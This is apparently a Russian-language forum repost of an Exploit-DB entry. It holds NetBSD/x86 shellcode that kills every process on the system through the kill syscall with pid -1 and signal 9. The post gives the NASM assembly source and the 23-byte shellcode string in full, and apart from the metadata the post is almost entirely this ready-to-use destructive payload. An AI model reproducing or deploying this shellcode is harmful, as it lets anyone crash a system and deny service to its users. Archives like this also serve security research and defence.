Exploit NetBSD/x86 - Kill All Processes Shellcode (23 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13470
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
SHELLCODE
Платформа
NETBSD_X86
CVE
N/A
Дата публикации
2009-06-18
C:
/*

netbsd/x86 kill all processes shellcode
author Anonymous

this shellcode is using syscall number 37 or 0x25
37      STD             { int sys_kill(int pid, int signum); }


here is assembler code using intel syntaxe and NASM
--------------begin-----------

section .note.netbsd.ident
 	dd	0x07,0x04,0x01
 	db	"NetBSD",0x00,0x00
 	dd	200000000
 
 
 section .data

 section .text
 	global _start
 
 _start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37 
push eax
int 0x80
-------------------------end------------

if we dissasemble this code wi will get shellcode
"\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"
*/

// milw0rm.com [2009-06-18]
 
Источник
www.exploit-db.com

Похожие темы